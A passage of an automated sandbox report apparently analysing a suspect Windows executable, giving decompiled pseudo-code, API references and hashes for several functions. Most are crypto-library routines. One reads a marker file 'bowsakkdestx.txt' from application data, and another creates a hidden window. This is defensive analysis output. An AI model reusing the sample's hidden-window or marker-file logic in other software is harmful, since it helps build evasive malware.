                                                                                                    					_t76 = _t76 + 0x10;
                                                                                                    				}
                                                                                                    				_t74 = _a12;
                                                                                                    				_t82 = _t74;
                                                                                                    				if(_t74 == 0) {
                                                                                                    					_push(_a8);
                                                                                                    					_push("reason(%lu)");
                                                                                                    					_push(0x40);
                                                                                                    					_push( &_a16);
                                                                                                    					E004567A0(_t82);
                                                                                                    					_t76 = _t76 + 0x10;
                                                                                                    				}
                                                                                                    				_t55 = _v0;
                                                                                                    				_t37 =  !=  ? _t74 :  &_a16;
                                                                                                    				_push( !=  ? _t74 :  &_a16);
                                                                                                    				_t39 =  !=  ? _t55 :  &_a80;
                                                                                                    				_push( !=  ? _t55 :  &_a80);
                                                                                                    				_t41 =  !=  ? _a4 :  &_a144;
                                                                                                    				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
                                                                                                    				_t57 = _t67;
                                                                                                    				_t77 = _t76 + 0x1c;
                                                                                                    				_t66 = _t57 + 1;
                                                                                                    				do {
                                                                                                    					_t43 =  *_t57;
                                                                                                    					_t57 = _t57 + 1;
                                                                                                    				} while (_t43 != 0);
                                                                                                    				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
                                                                                                    					_t69 = 0;
                                                                                                    					_t54 = _t54 + _t67;
                                                                                                    					do {
                                                                                                    						_t46 = E00431C30(_t67, 0x3a);
                                                                                                    						_t77 = _t77 + 8;
                                                                                                    						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
                                                                                                    							_t46 = _t54 - 5 + _t69;
                                                                                                    							 *_t46 = 0x3a;
                                                                                                    						}
                                                                                                    						_t69 = _t69 + 1;
                                                                                                    						_t67 = _t46 + 1;
                                                                                                    					} while (_t69 < 4);
                                                                                                    				}
                                                                                                    				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
                                                                                                    			}
























                                                                                                    0x004506a5
                                                                                                    0x004506aa
                                                                                                    0x004506b1
                                                                                                    0x004506b9
                                                                                                    0x004506c2
                                                                                                    0x004506cc
                                                                                                    0x004506de
                                                                                                    0x004506e4
                                                                                                    0x004506ee
                                                                                                    0x004506f8
                                                                                                    0x004506fc
                                                                                                    0x00450701
                                                                                                    0x00450704
                                                                                                    0x0045070d
                                                                                                    0x0045071b
                                                                                                    0x0045071c
                                                                                                    0x00450721
                                                                                                    0x00450723
                                                                                                    0x00450724
                                                                                                    0x00450729
                                                                                                    0x00450729
                                                                                                    0x0045072c
                                                                                                    0x00450731
                                                                                                    0x00450733
                                                                                                    0x00450734
                                                                                                    0x0045073d
                                                                                                    0x0045073f
                                                                                                    0x00450740
                                                                                                    0x00450745
                                                                                                    0x00450745
                                                                                                    0x00450748
                                                                                                    0x0045074c
                                                                                                    0x0045074e
                                                                                                    0x00450750
                                                                                                    0x00450758
                                                                                                    0x0045075d
                                                                                                    0x0045075f
                                                                                                    0x00450760
                                                                                                    0x00450765
                                                                                                    0x00450765
                                                                                                    0x00450768
                                                                                                    0x00450772
                                                                                                    0x00450777
                                                                                                    0x0045077c
                                                                                                    0x00450783
                                                                                                    0x0045078d
                                                                                                    0x00450799
                                                                                                    0x0045079e
                                                                                                    0x004507a0
                                                                                                    0x004507a3
                                                                                                    0x004507a6
                                                                                                    0x004507a6
                                                                                                    0x004507a8
                                                                                                    0x004507a9
                                                                                                    0x004507b4
                                                                                                    0x004507bb
                                                                                                    0x004507bd
                                                                                                    0x004507c0
                                                                                                    0x004507c3
                                                                                                    0x004507c8
                                                                                                    0x004507cd
                                                                                                    0x004507db
                                                                                                    0x004507dd
                                                                                                    0x004507dd
                                                                                                    0x004507e0
                                                                                                    0x004507e1
                                                                                                    0x004507e4
                                                                                                    0x004507c0
                                                                                                    0x00450801

                                                                                                    APIs
                                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ___from_strstr_to_strchr
                                                                                                    • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                    • API String ID: 601868998-2416195885
                                                                                                    • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                    • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                    • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                                    • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 97%
                                                                                                    			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t18;
                                                                                                    				intOrPtr _t19;
                                                                                                    				signed int _t40;
                                                                                                    				intOrPtr _t43;
                                                                                                    				signed int _t44;
                                                                                                    				intOrPtr _t51;
                                                                                                    				intOrPtr* _t52;
                                                                                                    				intOrPtr _t53;
                                                                                                    
                                                                                                    				_t55 = __ebp;
                                                                                                    				_t1 =  &_a8; // 0x463967
                                                                                                    				_t53 =  *_t1;
                                                                                                    				_t2 =  &_a4; // 0x463967
                                                                                                    				_t52 =  *_t2;
                                                                                                    				_t43 =  *_t52;
                                                                                                    				if(_t43 < _t53) {
                                                                                                    					__eflags =  *(_t52 + 8) - _t53;
                                                                                                    					if( *(_t52 + 8) < _t53) {
                                                                                                    						__eflags = _t53 - 0x5ffffffc;
                                                                                                    						if(__eflags <= 0) {
                                                                                                    							_t44 = _t53 + 3;
                                                                                                    							_t50 = 0xaaaaaaab * _t44 >> 0x20;
                                                                                                    							_t18 =  *((intOrPtr*)(_t52 + 4));
                                                                                                    							_push(__ebx);
                                                                                                    							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
                                                                                                    							__eflags = _t18;
                                                                                                    							if(_t18 != 0) {
                                                                                                    								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
                                                                                                    							} else {
                                                                                                    								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
                                                                                                    							}
                                                                                                    							_t51 = _t19;
                                                                                                    							__eflags = _t51;
                                                                                                    							if(__eflags != 0) {
                                                                                                    								__eflags = _t53 -  *_t52;
                                                                                                    								 *((intOrPtr*)(_t52 + 4)) = _t51;
                                                                                                    								 *(_t52 + 8) = _t40;
                                                                                                    								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
                                                                                                    								 *_t52 = _t53;
                                                                                                    								return _t53;
                                                                                                    							} else {
                                                                                                    								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
                                                                                                    								__eflags = 0;
                                                                                                    								return 0;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
                                                                                                    							__eflags = 0;
                                                                                                    							return 0;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
                                                                                                    						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
                                                                                                    						 *_t52 = _t53;
                                                                                                    						return _t53;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
                                                                                                    					 *_t52 = _t53;
                                                                                                    					return _t53;
                                                                                                    				}
                                                                                                    			}












                                                                                                    0x0045ae30
                                                                                                    0x0045ae31
                                                                                                    0x0045ae31
                                                                                                    0x0045ae36
                                                                                                    0x0045ae36
                                                                                                    0x0045ae3a
                                                                                                    0x0045ae3e
                                                                                                    0x0045ae5a
                                                                                                    0x0045ae5d
                                                                                                    0x0045ae7b
                                                                                                    0x0045ae81
                                                                                                    0x0045aea0
                                                                                                    0x0045aea8
                                                                                                    0x0045aeaa
                                                                                                    0x0045aead
                                                                                                    0x0045aeb2
                                                                                                    0x0045aeb5
                                                                                                    0x0045aeb7
                                                                                                    0x0045aedd
                                                                                                    0x0045aeb9
                                                                                                    0x0045aec4
                                                                                                    0x0045aec9
                                                                                                    0x0045aee5
                                                                                                    0x0045aee7
                                                                                                    0x0045aee9
                                                                                                    0x0045af0f
                                                                                                    0x0045af11
                                                                                                    0x0045af1a
                                                                                                    0x0045af1e
                                                                                                    0x0045af26
                                                                                                    0x0045af2d
                                                                                                    0x0045aeeb
                                                                                                    0x0045aefb
                                                                                                    0x0045af03
                                                                                                    0x0045af0a
                                                                                                    0x0045af0a
                                                                                                    0x0045ae83
                                                                                                    0x0045ae93
                                                                                                    0x0045ae9b
                                                                                                    0x0045ae9f
                                                                                                    0x0045ae9f
                                                                                                    0x0045ae5f
                                                                                                    0x0045ae67
                                                                                                    0x0045ae6c
                                                                                                    0x0045ae74
                                                                                                    0x0045ae7a
                                                                                                    0x0045ae7a
                                                                                                    0x0045ae40
                                                                                                    0x0045ae4b
                                                                                                    0x0045ae53
                                                                                                    0x0045ae59
                                                                                                    0x0045ae59

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                    • API String ID: 2102423945-3653307630
                                                                                                    • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                    • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                    • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                    • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 62%
                                                                                                    			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
                                                                                                    				char* _v24;
                                                                                                    				intOrPtr _v28;
                                                                                                    				signed int _v36;
                                                                                                    				signed int _v40;
                                                                                                    				short _v300;
                                                                                                    				void* __esi;
                                                                                                    				void* _t15;
                                                                                                    				void* _t17;
                                                                                                    				signed int _t20;
                                                                                                    				char* _t22;
                                                                                                    				signed int _t30;
                                                                                                    				void* _t40;
                                                                                                    				void* _t42;
                                                                                                    				void* _t46;
                                                                                                    				void* _t47;
                                                                                                    				void* _t49;
                                                                                                    				void* _t51;
                                                                                                    				signed int _t52;
                                                                                                    
                                                                                                    				if(_a4 != 0) {
                                                                                                    					_push(__ebx);
                                                                                                    					_t30 = E0043749C(_a4, 0x55);
                                                                                                    					if(_t30 < 0x55) {
                                                                                                    						_push(__edi);
                                                                                                    						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
                                                                                                    						_t42 = _t15;
                                                                                                    						if(_t42 != 0) {
                                                                                                    							_t5 = _t30 + 1; // 0x1
                                                                                                    							_t17 = E004374F1(_t42, _t5, _a4, _t5);
                                                                                                    							_t52 = _t51 + 0x10;
                                                                                                    							if(_t17 != 0) {
                                                                                                    								_push(0);
                                                                                                    								_push(0);
                                                                                                    								_push(0);
                                                                                                    								_push(0);
                                                                                                    								_push(0);
                                                                                                    								E004242FD(_t30, _t40);
                                                                                                    								asm("int3");
                                                                                                    								_t49 = _t47;
                                                                                                    								_push(_t49);
                                                                                                    								_t50 = _t52;
                                                                                                    								_t20 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    								_v40 = _t20 ^ _t52;
                                                                                                    								_t22 = _v24;
                                                                                                    								_t45 = _v28;
                                                                                                    								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                                                                                                    									E00425A97(_t30, _t40, _t45,  &_v300);
                                                                                                    								}
                                                                                                    								_pop(_t46);
                                                                                                    								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                                                                                                    							} else {
                                                                                                    								_t15 = _t42;
                                                                                                    								goto L5;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							L5:
                                                                                                    							goto L6;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_t15 = 0;
                                                                                                    						L6:
                                                                                                    						return _t15;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}





















                                                                                                    0x00425348
                                                                                                    0x0042534e
                                                                                                    0x00425359
                                                                                                    0x00425360
                                                                                                    0x0042536d
                                                                                                    0x0042536f
                                                                                                    0x00425374
                                                                                                    0x00425379
                                                                                                    0x0042537f
                                                                                                    0x00425388
                                                                                                    0x0042538d
                                                                                                    0x00425392
                                                                                                    0x0042539a
                                                                                                    0x0042539b
                                                                                                    0x0042539c
                                                                                                    0x0042539d
                                                                                                    0x0042539e
                                                                                                    0x0042539f
                                                                                                    0x004253a4
                                                                                                    0x004253a8
                                                                                                    0x004255d8
                                                                                                    0x004255d9
                                                                                                    0x004255e1
                                                                                                    0x004255e8
                                                                                                    0x004255eb
                                                                                                    0x004255ef
                                                                                                    0x004255f5
                                                                                                    0x00425620
                                                                                                    0x00425626
                                                                                                    0x00425630
                                                                                                    0x00425639
                                                                                                    0x00425394
                                                                                                    0x00425394
                                                                                                    0x00000000
                                                                                                    0x00425394
                                                                                                    0x0042537b
                                                                                                    0x0042537b
                                                                                                    0x00000000
                                                                                                    0x0042537b
                                                                                                    0x00425362
                                                                                                    0x00425362
                                                                                                    0x0042537c
                                                                                                    0x0042537e
                                                                                                    0x0042537e
                                                                                                    0x0042534a
                                                                                                    0x0042534d
                                                                                                    0x0042534d

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsnlen
                                                                                                    • String ID: U
                                                                                                    • API String ID: 3628947076-3372436214
                                                                                                    • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                    • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                    • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                                    • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 94%
                                                                                                    			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int _t10;
                                                                                                    				signed int _t11;
                                                                                                    				signed int _t14;
                                                                                                    				intOrPtr* _t15;
                                                                                                    				void* _t16;
                                                                                                    				signed int _t19;
                                                                                                    				intOrPtr _t20;
                                                                                                    				signed int _t26;
                                                                                                    				void* _t27;
                                                                                                    				intOrPtr* _t28;
                                                                                                    				void* _t29;
                                                                                                    				intOrPtr* _t33;
                                                                                                    				intOrPtr* _t34;
                                                                                                    				void* _t36;
                                                                                                    				void* _t40;
                                                                                                    				void* _t41;
                                                                                                    
                                                                                                    				_t28 = _a16;
                                                                                                    				if(_t28 == 0) {
                                                                                                    					_t10 = E0047D440();
                                                                                                    					_t38 = _a12;
                                                                                                    					__eflags = _t10;
                                                                                                    					_t24 = _a8;
                                                                                                    					_t33 = _a4;
                                                                                                    					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
                                                                                                    					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
                                                                                                    					_t41 = _t40 + 0x14;
                                                                                                    					__eflags = _t11;
                                                                                                    					if(__eflags != 0) {
                                                                                                    						L9:
                                                                                                    						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
                                                                                                    						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
                                                                                                    						__eflags = _t14;
                                                                                                    					} else {
                                                                                                    						do {
                                                                                                    							_t15 = _t33;
                                                                                                    							_t28 = _t15 + 1;
                                                                                                    							do {
                                                                                                    								_t26 =  *_t15;
                                                                                                    								_t15 = _t15 + 1;
                                                                                                    								__eflags = _t26;
                                                                                                    							} while (_t26 != 0);
                                                                                                    							_t14 = _t15 - _t28;
                                                                                                    							__eflags = _t14 - 4;
                                                                                                    							if(__eflags < 0) {
                                                                                                    								goto L8;
                                                                                                    							}
                                                                                                    							goto L10;
                                                                                                    							L8:
                                                                                                    							_push(4);
                                                                                                    							_push("phrase is too short, needs to be at least %d chars\n");
                                                                                                    							_t16 = E00420E4D();
                                                                                                    							E00422408(_t24, _t31, _t33, __eflags);
                                                                                                    							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
                                                                                                    							_t41 = _t41 + 0x20;
                                                                                                    							__eflags = _t19;
                                                                                                    						} while (__eflags == 0);
                                                                                                    						goto L9;
                                                                                                    					}
                                                                                                    					L10:
                                                                                                    					return _t14;
                                                                                                    				} else {
                                                                                                    					_t34 = _t28;
                                                                                                    					_t27 = _t34 + 1;
                                                                                                    					do {
                                                                                                    						_t20 =  *_t34;
                                                                                                    						_t34 = _t34 + 1;
                                                                                                    					} while (_t20 != 0);
                                                                                                    					_t36 =  >  ? _a8 : _t34 - _t27;
                                                                                                    					E0042D8D0(_a4, _t28, _t36);
                                                                                                    					return _t36;
                                                                                                    				}
                                                                                                    			}























                                                                                                    0x00462ff0
                                                                                                    0x00462ff7
                                                                                                    0x00463027
                                                                                                    0x0046302c
                                                                                                    0x00463030
                                                                                                    0x00463032
                                                                                                    0x0046303b
                                                                                                    0x0046303f
                                                                                                    0x00463048
                                                                                                    0x0046304d
                                                                                                    0x00463050
                                                                                                    0x00463052
                                                                                                    0x00463095
                                                                                                    0x004630a2
                                                                                                    0x004630b3
                                                                                                    0x004630b3
                                                                                                    0x00463054
                                                                                                    0x00463054
                                                                                                    0x00463054
                                                                                                    0x00463056
                                                                                                    0x00463060
                                                                                                    0x00463060
                                                                                                    0x00463062
                                                                                                    0x00463063
                                                                                                    0x00463063
                                                                                                    0x00463067
                                                                                                    0x00463069
                                                                                                    0x0046306c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046306e
                                                                                                    0x0046306e
                                                                                                    0x00463070
                                                                                                    0x00463075
                                                                                                    0x0046307e
                                                                                                    0x00463089
                                                                                                    0x0046308e
                                                                                                    0x00463091
                                                                                                    0x00463091
                                                                                                    0x00000000
                                                                                                    0x00463054
                                                                                                    0x004630b6
                                                                                                    0x004630ba
                                                                                                    0x00462ff9
                                                                                                    0x00462ff9
                                                                                                    0x00462ffb
                                                                                                    0x00463000
                                                                                                    0x00463000
                                                                                                    0x00463002
                                                                                                    0x00463003
                                                                                                    0x0046300d
                                                                                                    0x00463018
                                                                                                    0x00463023
                                                                                                    0x00463023

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _fprintf_memset
                                                                                                    • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                    • API String ID: 3021507156-3399676524
                                                                                                    • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                    • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                    • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                                    • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0040C500(void* __ecx, void* __edx) {
                                                                                                    				char _v264;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				char* _t4;
                                                                                                    				void* _t10;
                                                                                                    				void* _t19;
                                                                                                    				void* _t21;
                                                                                                    				void* _t22;
                                                                                                    				void* _t23;
                                                                                                    				void* _t27;
                                                                                                    
                                                                                                    				_t21 = __edx;
                                                                                                    				_t4 =  &_v264;
                                                                                                    				_t19 = __ecx;
                                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                                    				if(_t4 >= 0) {
                                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                                    					_t27 = E004220B6( &_v264, "r");
                                                                                                    					__eflags = _t27;
                                                                                                    					if(__eflags != 0) {
                                                                                                    						_push(_t22);
                                                                                                    						_push(2);
                                                                                                    						_push(0);
                                                                                                    						_push(_t27);
                                                                                                    						E0042387F(_t19, _t21, _t22, _t27, __eflags);
                                                                                                    						_push(_t27);
                                                                                                    						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
                                                                                                    						_push(_t27);
                                                                                                    						_t23 = _t10;
                                                                                                    						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
                                                                                                    						__eflags = _t23;
                                                                                                    						if(__eflags == 0) {
                                                                                                    							L7:
                                                                                                    							_push(_t27);
                                                                                                    							E00423A38(_t19, _t23, _t27, __eflags);
                                                                                                    							__eflags = 0;
                                                                                                    							return 0;
                                                                                                    						} else {
                                                                                                    							__eflags = _t23 - 0x400;
                                                                                                    							if(__eflags > 0) {
                                                                                                    								goto L7;
                                                                                                    							} else {
                                                                                                    								E004222F5(_t19, 1, _t23, _t27);
                                                                                                    								_push(_t27);
                                                                                                    								E00423A38(_t19, _t23, _t27, __eflags);
                                                                                                    								return 1;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						__eflags = 0;
                                                                                                    						return 0;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}















                                                                                                    0x0040c500
                                                                                                    0x0040c509
                                                                                                    0x0040c519
                                                                                                    0x0040c51b
                                                                                                    0x0040c523
                                                                                                    0x0040c539
                                                                                                    0x0040c550
                                                                                                    0x0040c555
                                                                                                    0x0040c557
                                                                                                    0x0040c561
                                                                                                    0x0040c562
                                                                                                    0x0040c564
                                                                                                    0x0040c566
                                                                                                    0x0040c567
                                                                                                    0x0040c56c
                                                                                                    0x0040c56d
                                                                                                    0x0040c572
                                                                                                    0x0040c573
                                                                                                    0x0040c575
                                                                                                    0x0040c57d
                                                                                                    0x0040c57f
                                                                                                    0x0040c5a5
                                                                                                    0x0040c5a5
                                                                                                    0x0040c5a6
                                                                                                    0x0040c5ae
                                                                                                    0x0040c5b6
                                                                                                    0x0040c581
                                                                                                    0x0040c581
                                                                                                    0x0040c587
                                                                                                    0x00000000
                                                                                                    0x0040c589
                                                                                                    0x0040c58e
                                                                                                    0x0040c593
                                                                                                    0x0040c594
                                                                                                    0x0040c5a4
                                                                                                    0x0040c5a4
                                                                                                    0x0040c587
                                                                                                    0x0040c559
                                                                                                    0x0040c55a
                                                                                                    0x0040c560
                                                                                                    0x0040c560
                                                                                                    0x0040c525
                                                                                                    0x0040c52b
                                                                                                    0x0040c52b

                                                                                                    APIs
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Path$AppendFolder
                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                    • API String ID: 29327785-2616962270
                                                                                                    • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                    • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                                    • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                    • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041BA80(struct HINSTANCE__* __ecx) {
                                                                                                    				struct HWND__* _t1;
                                                                                                    				struct HWND__* _t6;
                                                                                                    
                                                                                                    				 *0x513244 = __ecx;
                                                                                                    				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
                                                                                                    				_t6 = _t1;
                                                                                                    				if(_t6 != 0) {
                                                                                                    					ShowWindow(_t6, 0);
                                                                                                    					UpdateWindow(_t6);
                                                                                                    					 *0x51323c = _t6;
                                                                                                    					return 1;
                                                                                                    				} else {
                                                                                                    					return _t1;
                                                                                                    				}
                                                                                                    			}





                                                                                                    0x0041baa7
                                                                                                    0x0041baad
                                                                                                    0x0041bab3
                                                                                                    0x0041bab7
                                                                                                    0x0041babe
                                                                                                    0x0041bac5
                                                                                                    0x0041bacb
                                                                                                    0x0041bad7
                                                                                                    0x0041baba
                                                                                                    0x0041baba
                                                                                                    0x0041baba

                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                    • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShowUpdate
                                                                                                    • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                    • API String ID: 2944774295-3503800400
                                                                                                    • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                    • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
